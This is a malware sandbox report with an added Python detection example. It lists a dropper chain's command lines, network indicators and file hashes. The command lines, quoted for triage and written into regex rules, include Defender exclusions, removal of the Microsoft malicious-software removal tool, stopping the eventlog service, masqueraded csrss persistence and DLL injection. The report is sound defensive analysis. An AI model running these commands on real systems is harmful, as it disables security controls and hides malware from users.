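The command lines in the process list carry most of the detection value of this report, and several of them are worth calling out individually. Add-MpPreference excludes every .exe under the user profile and ProgramData from Defender (the service binary is dropped under C:\ProgramData\xcfonrchdkar\). wusa /uninstall /kb:890830 removes the Malicious Software Removal Tool. sc.exe creates and starts an auto-start service with a random name and then stops the eventlog service. netsh adds an inbound allow rule for C:\Windows\rss\csrss.exe, a binary named after the real csrss.exe but living outside System32, which schtasks then registers to run at logon with highest privileges. injector.exe loads NtQuerySystemInformationHook.dll into taskmgr.exe; the DLL name suggests the hook hides processes from Task Manager, but the report does not show its behaviour, so treat that as an inference. chcp 1251 switches cmd.exe to the Cyrillic code page before Task.bat runs. The WerFault invocation with -p 2084 is the crash of nst5A33.tmp (PID 2084 in the WriteProcessMemory table), which is the "Program crash" signature. The rule set below is an added example, not part of the original report: it runs simple command-line rules over a constructed subset of these command lines (copied from the list above, plus a few benign ones to show they are not flagged) and labels each hit with the ATT&CK technique a triage analyst would record. The rule names and regexes are this example's own.

```python
import re

# Command lines copied from the process list above; a constructed subset (unique
# entries only, with a few benign ones kept in to show they are not flagged).
SAMPLE_CMDLINES = [
    r'"C:\Users\Admin\AppData\Local\Temp\5cddaacf9782c030db128e3ebfd8f301.exe"',
    r"regsvr32 /s C:\Users\Admin\AppData\Local\Temp\F231.dll",
    r'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "',
    r"chcp 1251",
    r'''schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F''',
    r"powershell -nologo -noprofile",
    r"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force",
    r'C:\Windows\system32\sc.exe delete "UTIXDCVF"',
    r"C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart",
    r'C:\Windows\system32\sc.exe create "UTIXDCVF" binpath= "C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe" start= "auto"',
    r'C:\Windows\system32\sc.exe start "UTIXDCVF"',
    r"C:\Windows\system32\sc.exe stop eventlog",
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r"C:\Windows\rss\csrss.exe",
    r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
    r"schtasks /delete /tn ScheduledUpdate /f",
    r"C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll",
]

# (rule name, ATT&CK technique, pattern). Rule names are this example's own labels.
RULES = [
    ("defender_exclusion", "T1562.001", re.compile(r"Add-MpPreference\b.*-Exclusion(Path|Extension|Process)", re.I)),
    ("msrt_removal", "T1562.001", re.compile(r"\bwusa\b.*/uninstall\b.*/kb:890830", re.I)),
    ("service_create", "T1543.003", re.compile(r"\bsc(\.exe)?\s+create\b", re.I)),
    ("eventlog_stop", "T1562.002", re.compile(r"\bsc(\.exe)?\s+stop\s+eventlog\b", re.I)),
    ("firewall_allow_rule", "T1562.004", re.compile(r"\bnetsh\b.*advfirewall\s+firewall\s+add\s+rule\b.*action=allow", re.I)),
    ("schtask_create", "T1053.005", re.compile(r"\bschtasks(\.exe)?\s+/create\b", re.I)),
    ("schtask_highest_onlogon", "T1053.005", re.compile(r"\bschtasks(\.exe)?\s+/create\b.*(/sc\s+onlogon|/rl\s+highest)", re.I)),
    ("dll_injection_tool", "T1055.001", re.compile(r"\binjector\.exe\b.*\.dll\b", re.I)),
    ("masquerade_csrss", "T1036.005", re.compile(r"\\rss\\csrss\.exe", re.I)),
    ("regsvr32_temp_dll", "T1218.010", re.compile(r"\bregsvr32(\.exe)?\b.*\\Temp\\.*\.dll", re.I)),
]


def flag_cmdline(cmdline):
    """Return the (rule, technique) pairs that match one command line."""
    return [(name, tid) for name, tid, rx in RULES if rx.search(cmdline)]


def scan(cmdlines):
    """Run every rule over every command line; one finding per (rule, command line)."""
    findings = []
    for cmd in cmdlines:
        for name, tid in flag_cmdline(cmd):
            findings.append({"rule": name, "technique": tid, "cmdline": cmd})
    return findings


def summarize(findings):
    """Count hits per rule, which shows at a glance which defence-evasion and
    persistence steps a chain performs."""
    counts = {}
    for f in findings:
        counts[f["rule"]] = counts.get(f["rule"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"{f['technique']:10} {f['rule']:24} {f['cmdline'][:90]}")
    print(summarize(scan(SAMPLE_CMDLINES)))
```

The rules key on arguments rather than image paths because the same commands appear here through both the System32 and SysWOW64 copies of sc.exe, schtasks.exe and powershell.exe; in production telemetry the schtask_create rule on its own will fire on legitimate installers, so the highest/onlogon variant and the ProgramData/UserProfile-wide Defender exclusion are the hits to page on.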

Network

Country Destination Domain Proto
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 selebration17io.io udp
RU 91.215.85.120:80 selebration17io.io tcp
US 8.8.8.8:53 120.85.215.91.in-addr.arpa udp
US 8.8.8.8:53 resergvearyinitiani.shop udp
US 104.21.94.2:443 resergvearyinitiani.shop tcp
US 8.8.8.8:53 2.94.21.104.in-addr.arpa udp
US 8.8.8.8:53 technologyenterdo.shop udp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 8.8.8.8:53 118.80.21.104.in-addr.arpa udp
US 8.8.8.8:53 detectordiscusser.shop udp
US 104.21.60.92:443 detectordiscusser.shop tcp
US 8.8.8.8:53 92.60.21.104.in-addr.arpa udp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 8.8.8.8:53 turkeyunlikelyofw.shop udp
US 8.8.8.8:53 joly.bestsup.su udp
US 172.67.171.112:80 joly.bestsup.su tcp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 8.8.8.8:53 associationokeo.shop udp
US 172.67.147.18:443 associationokeo.shop tcp
US 8.8.8.8:53 112.171.67.172.in-addr.arpa udp
US 8.8.8.8:53 253.76.21.104.in-addr.arpa udp
DE 185.172.128.19:80 185.172.128.19 tcp
US 8.8.8.8:53 18.147.67.172.in-addr.arpa udp
US 8.8.8.8:53 19.128.172.185.in-addr.arpa udp
RU 213.158.31.231:22711 tcp
DE 185.220.101.22:30022 tcp
US 8.8.8.8:53 trmpc.com udp
MX 189.232.56.10:80 trmpc.com tcp
CA 149.56.98.216:9001 tcp
US 8.8.8.8:53 10.56.232.189.in-addr.arpa udp
LV 195.123.209.91:5092 tcp
DE 185.172.128.90:80 185.172.128.90 tcp
US 8.8.8.8:53 90.128.172.185.in-addr.arpa udp
DE 185.172.128.127:80 185.172.128.127 tcp
US 8.8.8.8:53 127.128.172.185.in-addr.arpa udp
US 8.8.8.8:53 180.178.17.96.in-addr.arpa udp
US 104.21.94.2:443 resergvearyinitiani.shop tcp
US 104.21.80.118:443 technologyenterdo.shop tcp
US 8.8.8.8:53 lighterepisodeheighte.fun udp
US 8.8.8.8:53 problemregardybuiwo.fun udp
US 104.21.60.92:443 detectordiscusser.shop tcp
US 8.8.8.8:53 edurestunningcrackyow.fun udp
US 8.8.8.8:53 pooreveningfuseor.pw udp
US 104.21.76.253:443 turkeyunlikelyofw.shop tcp
US 172.67.147.18:443 associationokeo.shop tcp
DE 185.172.128.145:80 185.172.128.145 tcp
US 8.8.8.8:53 145.128.172.185.in-addr.arpa udp
DE 185.220.101.145:10145 tcp
US 154.35.175.225:443 tcp
N/A 127.0.0.1:58864 tcp
US 8.8.8.8:53 145.101.220.185.in-addr.arpa udp
BR 143.107.229.210:42256 tcp
DE 131.188.40.189:443 tcp
US 8.8.8.8:53 189.40.188.131.in-addr.arpa udp
DE 37.221.196.71:443 tcp
DE 141.147.45.13:443 tcp
US 8.8.8.8:53 13.45.147.141.in-addr.arpa udp
US 8.8.8.8:53 71.196.221.37.in-addr.arpa udp
AT 5.42.64.33:80 5.42.64.33 tcp
US 8.8.8.8:53 33.64.42.5.in-addr.arpa udp
DE 37.221.196.71:443 tcp
DE 141.147.45.13:443 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 xmr-eu2.nanopool.org udp
PL 51.68.137.186:14433 xmr-eu2.nanopool.org tcp
US 8.8.8.8:53 186.137.68.51.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:443 pastebin.com tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 kamsmad.com udp
MX 187.204.68.217:80 kamsmad.com tcp
US 8.8.8.8:53 217.68.204.187.in-addr.arpa udp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
N/A 127.0.0.1:20428 tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
US 8.8.8.8:53 9b6112bf-4703-435e-a986-e508b6e797a0.uuid.statsexplorer.org udp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
MX 187.204.68.217:80 kamsmad.com tcp
US 8.8.8.8:53 bocapaverseal.com udp
US 8.8.8.8:53 britches-peru.com udp
US 162.0.209.83:443 bocapaverseal.com tcp
US 8.8.8.8:53 onepercentmindsetof.com udp
US 8.8.8.8:53 onesentencepolitics.com udp
US 198.54.126.63:80 britches-peru.com tcp
US 8.8.8.8:53 projectsaudeebeleza.com udp
US 8.8.8.8:53 thepeoplesproject-my.com udp
US 162.241.216.41:443 onesentencepolitics.com tcp
US 192.185.222.207:443 onepercentmindsetof.com tcp
US 8.8.8.8:53 karensonlinemarketing.com udp
US 8.8.8.8:53 cyberworldinformation.com udp
US 192.185.213.241:443 projectsaudeebeleza.com tcp
US 162.241.224.209:443 thepeoplesproject-my.com tcp
US 8.8.8.8:53 dashdeliverylogistics.com udp
US 162.241.218.61:443 karensonlinemarketing.com tcp
US 8.8.8.8:53 deckbuildersinstcloud.com udp
US 8.8.8.8:53 83.209.0.162.in-addr.arpa udp
US 8.8.8.8:53 63.126.54.198.in-addr.arpa udp
US 8.8.8.8:53 207.222.185.192.in-addr.arpa udp
US 8.8.8.8:53 41.216.241.162.in-addr.arpa udp
US 8.8.8.8:53 detectivesprivadosipc.com udp
US 8.8.8.8:53 www.deutsches-ki-institut.de udp
US 89.117.139.252:443 dashdeliverylogistics.com tcp
US 185.150.190.167:80 cyberworldinformation.com tcp
US 8.8.8.8:53 www.discoverytranslations.com udp
US 199.59.243.225:443 deckbuildersinstcloud.com tcp
US 8.8.8.8:53 doingcleaningservices.com udp
US 162.241.61.248:443 detectivesprivadosipc.com tcp
US 8.8.8.8:53 dreduardoacevedoreuma.com udp
DE 85.13.162.216:443 www.deutsches-ki-institut.de tcp
IT 89.46.108.58:443 www.discoverytranslations.com tcp
US 8.8.8.8:53 www.ds-renovation-habitat.com udp
US 8.8.8.8:53 enchantedvisionevents.com udp
US 8.8.8.8:53 energyproviderexperts.com udp
US 165.22.142.86:443 doingcleaningservices.com tcp
US 8.8.8.8:53 essencefurniturestore.com udp
US 8.8.8.8:53 faizonetransportation.com udp
US 8.8.8.8:53 209.224.241.162.in-addr.arpa udp
US 8.8.8.8:53 61.218.241.162.in-addr.arpa udp
US 8.8.8.8:53 241.213.185.192.in-addr.arpa udp
US 8.8.8.8:53 167.190.150.185.in-addr.arpa udp
US 8.8.8.8:53 225.243.59.199.in-addr.arpa udp
US 8.8.8.8:53 252.139.117.89.in-addr.arpa udp
US 8.8.8.8:53 248.61.241.162.in-addr.arpa udp
US 8.8.8.8:53 everythingcooperstown.com udp
US 162.241.61.144:443 dreduardoacevedoreuma.com tcp
US 8.8.8.8:53 flybynightweddingblog.com udp
US 8.8.8.8:53 weltraum.de udp
US 8.8.8.8:53 forumcgeciacademy2023.com udp
US 89.117.139.222:443 enchantedvisionevents.com tcp
US 68.65.122.36:443 essencefurniturestore.com tcp

Files


memory/4856-118-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/4856-119-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/4856-121-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/4856-122-0x00000000024A0000-0x00000000025AE000-memory.dmp

memory/3232-123-0x0000000002DB0000-0x0000000002ED9000-memory.dmp

memory/3232-125-0x0000000002EE0000-0x0000000002FEE000-memory.dmp

memory/3232-127-0x0000000002EE0000-0x0000000002FEE000-memory.dmp

memory/3232-128-0x0000000002EE0000-0x0000000002FEE000-memory.dmp

memory/3232-131-0x0000000000400000-0x0000000000848000-memory.dmp

memory/3232-132-0x00000000758F0000-0x0000000075903000-memory.dmp

memory/4028-134-0x0000000000400000-0x0000000002D8C000-memory.dmp

memory/2868-138-0x0000000000400000-0x0000000000414000-memory.dmp

memory/3588-139-0x0000000000400000-0x00000000004BC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\375C.exe

MD5 9a8ced484319575a23b23e72ef064368
SHA1 630123e785da8b196387dd67444bb2153f71c054
SHA256 2fdc3d510975484e43a2e755f922423b99eb6bcaf387490364fa3cecdb4da8cf
SHA512 0500b0cdb012d01e23fbefe2ed2b2c80644d496565ef608fe518b82f65aeb4461f9ad8f4d558b8f3913c739d8fa068e64b35a0dab0871855eb33b50696184336

C:\Users\Admin\AppData\Local\Temp\375C.exe

MD5 b5c2ec343dc281502edf2acb8cd6c48f
SHA1 6f9eaad5ce27c14f89a6cbf0ba7e7df200e1c5a1
SHA256 1fe33d26d59f5f45c4b818ad7fe23edb58959e5798c7a4403b7acb9aca1849b1
SHA512 9a1f6a2609b0def69d8cf3138731e0a92313fee71c931af0597875b2d75a00c959ece348aa8e674e4ac2e0b3e9909deee5c8b10f70d08e19eb8a87bc4e680ec2

memory/2068-143-0x0000000000400000-0x0000000000720000-memory.dmp

memory/3232-144-0x0000000000400000-0x0000000000848000-memory.dmp

memory/5104-145-0x0000000000C00000-0x00000000014B6000-memory.dmp

memory/3232-147-0x0000000000400000-0x0000000000848000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 f6bf5c21a8247203eb4280e83fba6664
SHA1 e7558d48e41f127dd779c35a7eb1613c74761249
SHA256 0774c2e1349c193926417a5f1783ed1961111ab1d30d2383fca93e6525262a6f
SHA512 60da2899d4fbc8910a69eb3daad48f96bdd769178ccba6c55e640989514943897a2f9f6a355ed97cb16bacdcceb57eaa7eedacd6901242887c045ae4593f0817

memory/5104-148-0x00000000733E0000-0x0000000073B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\4901.exe

MD5 0ca68f13f3db569984dbcc9c0be6144a
SHA1 8c53b9026e3c34bcf20f35af15fc6545cb337936
SHA256 9cd86fa59ea2d10f9b9f3293c132f158fcb7dd993fdb706944f9fe9fa409504a
SHA512 4c3a3be5fda0f9060a08b95383b5260e4079dbcff73849d2fac88520ae625c33a73c5858b25b717fcccebf03c3ad9b19807de8bcfa7ea22be6648cc965072b7d

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 59782185bcf5b215e0db15afa0002e06
SHA1 8a4e122681e234f1b39647eb6c0cde54d177fe9e
SHA256 ff6eec4eee9143ac8234e33d2753a15f00a209cd08ac609e36ad58aa5e60304c
SHA512 36bd597ab3c08fb5ce6803ace74951bf5b208125fc15087fd0ffbb0c439b4ffa334b1f527c277eaf8169e6d4b11b4d9ec8cc0c8776ecc3c1938044dc6fe05ec9

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 76b128828f81877a5adfad5eb220a4fd
SHA1 ea048c8f4c2e8c585ddf0e8f45597186b6bbaaa4
SHA256 1ac611ae91a2b51544cd72ede52d8357b95ab618efc8a000acebf5803c2ed2b5
SHA512 6a3b7f032aa40d119415adb87aa14ca9f6fc816fc84cb8f9f8e981420d33510129d9b5651d8af9cdc00c55cf94afdfdddd2246c3b505ac9c8276e1f725aa2746

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 43706993cce342c8b85b1b175f941c96
SHA1 d10587600a64da3210a83da771bd7b64d5b81e1f
SHA256 bd7e266eea9db4686f795a0c2ae61684537ee997cdda24b9935e7c7af12d785c
SHA512 2180ff0458f547c3abb14e0089e7ab2f71d23ec4fe88d6a3596a76839d11dc180022520c0e61dff8b24c3e98dcf082df59279904b02ba3459b1e0298a10ea91d

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 7c09db9c2dacb9e2f18b225f9f204f7a
SHA1 8b2e2227f02371994fb1a5d3839568a713fa7600
SHA256 2f0d802802e13e5208a8adf47fb03f66e2ba0625396220a2f6af920bd0fc6674
SHA512 ee6eb0cc2ccc30ebcb3a7b70e2bdbbbbaf17d8745576cc1eb5d80744118ac484e42eb202ff4b8c8a59aa380e95b2d5b09d1754d26c3d72bfb0c6f8ef4f85830b

C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe

MD5 b17be9c9cd31a7c69c5dccc4222f3241
SHA1 0c4f24a70c3f555d8ebee3397a850a08f68051d1
SHA256 45c0c53b6d1c5d7694e381ae14a6cd19e44d54dddb7c4aac00fe5fba9483b9ea
SHA512 ff0884a00096e018008b5b50876ef6345959eaea8f5a0945a748070df87824ffb47566c50fc1474bf7f988801ffbc8a5c04e273483ee93615de027890efc3787

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 9e3c0fbd879284ddc1a24e3ae2310922
SHA1 ec7dc55591baa85b28453ddfbebc7e5b5bffe02c
SHA256 4c3812e784e2b73faa15262bd1126be8479fb3246f5f18bd519c71e70b59594d
SHA512 1d82ec2ea8538aad5d74b31053860634825f3b62c0e8dce40d3576791cdef71967eb42792af18e8d088e85ca705365fefa8e635e2e0f6d4b1b0b2a2bab6fa21f

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\nsj4F64.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 70b05ac593ba4afd847436f2dbd542a3
SHA1 d8adc1ea4f762639a79f2f2ce2f3dece4a067e27
SHA256 dd24bebe073f6d912f3661a5944814beb824e7a655fecccb2245d768eda51a5a
SHA512 829eb47e34d72785857b964357edfcfd2e7121ed6292fed5f490a11bc8c3990902b960c7f8a4597c26b1a909befaf5cf3133f274540842d6e8b0d0c9e8fe03b7

memory/5104-191-0x00000000733E0000-0x0000000073B90000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\FourthX.exe

MD5 2fe9860d62aeebd600e504a6b6c7a9d2
SHA1 edaa583ccc78d914c79389e69d24ce7264a813ef
SHA256 1a75104e58525eed39afac6c3de839e436f7e5212390c4b50c8d308c4d0090c7
SHA512 5429b0f28ed8745eae7d6f2c517ec6c7fc53a48c04c420fb7fb46363d1a98cb239125cf356a8167f23c55a66bd4f3b2872e6e7d10274531179d91544e7cbef57

memory/3232-194-0x0000000000400000-0x0000000000848000-memory.dmp

memory/4432-195-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

MD5 9089c5ddf54262d275ab0ea6ceaebcba
SHA1 4796313ad8d780936e549ea509c1932deb41e02a
SHA256 96766ea71dc59a5b1734aba76c1ab1cbc8459a9ee023e9875359667dbf51ea4a
SHA512 ec71801feccd0c900132425d6bc601bcae6e78702b708df80783a752d08c8bdc49f0b0c8e7c37b15a02b381369b8a3c1114d7385796316b834738045f7dc053c

C:\Users\Admin\AppData\Local\Temp\nst5A33.tmp

MD5 0ab522cd9cc4a004d8b7b21445b58132
SHA1 62da3b22a7ef628712fc771cd10fac96bafb558f
SHA256 4e6080d8571cd53972a0dfa4f383d61ee95efef520988cf50a17bd569beb6486
SHA512 7cc4575c6746eaa92ab837c38203deed2c4beaff6aae6bd60e68edd0a197091695be68f968289db6892f3a96425c334771673daa08c3d8a51be8deb56e75dfc9

memory/4028-208-0x0000000002DF0000-0x0000000002EF0000-memory.dmp

memory/3336-209-0x00000000028A0000-0x0000000002CA7000-memory.dmp

memory/3336-210-0x0000000002DB0000-0x000000000369B000-memory.dmp

memory/3336-211-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Roaming\Temp\Task.bat

MD5 11bb3db51f701d4e42d3287f71a6a43e
SHA1 63a4ee82223be6a62d04bdfe40ef8ba91ae49a86
SHA256 6be22058abfb22b40a42fb003f86b89e204a83024c03eb82cd53e2a0a047c331
SHA512 907ad2c070cc1db89f43459a94d7f48985d939d749c9648b78572a266f0d3fde47813a129e9151dbf4a7d96d36f588172f57c88b8b947b56ed818d7d068abab2

memory/2068-214-0x0000000000400000-0x0000000000720000-memory.dmp

memory/3232-216-0x0000000000400000-0x0000000000848000-memory.dmp

memory/3588-215-0x0000000000540000-0x0000000000541000-memory.dmp

memory/2020-217-0x0000000002510000-0x0000000002610000-memory.dmp

memory/2020-218-0x00000000023F0000-0x00000000023FB000-memory.dmp

memory/2020-220-0x0000000000400000-0x00000000022D1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\70AE.exe

MD5 b10895f77c325310116cfc47095d9252
SHA1 4c1ae27fef692ec05ff826aa7eaab519ae5a8e06
SHA256 851657de20aed9fdce10b608dce83523d137771c2e1e9582f8d9eecff5a14453
SHA512 d21cca7801fcf891e88b39378a7f06179577b218f5660f4cc049b16f03f7bf8f910370734af7b005cf17bc5769fb6aef868e6659a1a648cf374c70d4aa9a7910

C:\Users\Admin\AppData\Local\Temp\70AE.exe

MD5 3b8ff5ba60fc77e4bce540bd0f9c09fd
SHA1 d9b48cf74f8261a3c98d712a485a09547e01d4de
SHA256 e08ba45aa1191f8c5e85a1d0d8ae916326d435f6b9859bc6d23c0672daee0c96
SHA512 c491be1946726fe31017080388095e28f141b86f56cf6276882105de491376612f7a928fc59de8661741413e4276ffd827e4142cf7945466ed40da10a6cbf68a

memory/3336-226-0x0000000000400000-0x0000000000D1C000-memory.dmp

memory/4816-227-0x0000000001790000-0x0000000001791000-memory.dmp

memory/4432-228-0x0000000000400000-0x00000000008E2000-memory.dmp

memory/4816-229-0x00000000017A0000-0x00000000017A1000-memory.dmp

memory/4816-230-0x00000000017B0000-0x00000000017B1000-memory.dmp

memory/4816-233-0x0000000001800000-0x0000000001801000-memory.dmp

memory/4816-232-0x00000000017F0000-0x00000000017F1000-memory.dmp

memory/4816-234-0x0000000001810000-0x0000000001811000-memory.dmp

memory/4816-231-0x0000000000860000-0x000000000130D000-memory.dmp

memory/4816-236-0x0000000001820000-0x0000000001821000-memory.dmp

memory/2068-239-0x0000000000400000-0x0000000000720000-memory.dmp

memory/4816-240-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/4816-242-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/4816-243-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/4816-241-0x00000000033A0000-0x00000000033D2000-memory.dmp

memory/2084-246-0x00000000024C0000-0x00000000025C0000-memory.dmp

memory/2084-247-0x0000000002440000-0x0000000002467000-memory.dmp

memory/2084-248-0x0000000000400000-0x00000000022D9000-memory.dmp

memory/3512-250-0x00000000030A0000-0x00000000030B6000-memory.dmp

memory/4816-254-0x0000000000860000-0x000000000130D000-memory.dmp

memory/2020-255-0x0000000000400000-0x00000000022D1000-memory.dmp

memory/4972-265-0x0000000002920000-0x0000000002956000-memory.dmp

memory/4972-269-0x00000000052B0000-0x00000000058D8000-memory.dmp

memory/4972-271-0x0000000072E50000-0x0000000073600000-memory.dmp

memory/4972-282-0x0000000004C70000-0x0000000004C80000-memory.dmp

memory/4972-286-0x0000000004C70000-0x0000000004C80000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iywfhfbd.z3b.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4432-294-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

memory/4972-287-0x0000000005160000-0x0000000005182000-memory.dmp

memory/4972-296-0x0000000005950000-0x00000000059B6000-memory.dmp

memory/4972-300-0x0000000005AA0000-0x0000000005B06000-memory.dmp

memory/4972-303-0x0000000005B10000-0x0000000005E64000-memory.dmp

memory/4972-325-0x0000000004CA0000-0x0000000004CBE000-memory.dmp

memory/4972-326-0x0000000005F60000-0x0000000005FAC000-memory.dmp

memory/4972-333-0x0000000006440000-0x0000000006484000-memory.dmp

memory/3336-341-0x00000000028A0000-0x0000000002CA7000-memory.dmp

memory/4972-342-0x0000000004C70000-0x0000000004C80000-memory.dmp

C:\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdesc-consensus.tmp

MD5 adb29a2b3d4aae105be1eca35da10afc
SHA1 8496caa674d5bd59c37340e949871e6a33a6a6a9
SHA256 9bc8d90c27922ab30615548b2e41d62f15ab2749290713bb3714b53ae21ab4b7
SHA512 7dba52ac5bdbaa9dafd8a98503e60636ab8db09ae99faa725b768c739147ca5dd42a6b78c3879b70af9ce7093ac8f1e23d706df7f53e2d64f66de5d13e958df9

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\ProgramData\Are.docx

MD5 a33e5b189842c5867f46566bdbf7a095
SHA1 e1c06359f6a76da90d19e8fd95e79c832edb3196
SHA256 5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454
SHA512 f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

MD5 c7fe878e6fc3be20c84b5e85b97efe17
SHA1 51ebfabdef927465e68c5843ae4f2a930b82a24b
SHA256 a4a662c0c92c27d74fc00f6f5e24b1b4116da7d582607161f0570cdfcc0a6040
SHA512 24f2fd40425ce1a1585157255b0dbb856635fa2fb08f00419693ebf8e0c774d47890aad7b69adee08b315607b0bc68375421737f4785b577110894028a013289

C:\Users\Admin\AppData\Local\Temp\4KPV6A~1\cached-microdescs.new

MD5 c872c92977f6a8428d1f1bc05244f4a3
SHA1 aa1a48a997997717b66b4cc4621ff14d65d14afe
SHA256 fae2fe308dee13de2c7a2be3dfac523a3ea62701a68eeea7fa34db79f02da1ea
SHA512 0d860841f0fd145c628e7d9f36c59b555f6bfdd4f8768769b74d3c6f67a0d87dcc08c442a3d3891c9831c2f08d40e98413e54c3362a9d842c0776b67e0009963

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe

MD5 b03886cb64c04b828b6ec1b2487df4a4
SHA1 a7b9a99950429611931664950932f0e5525294a4
SHA256 5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc
SHA512 21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
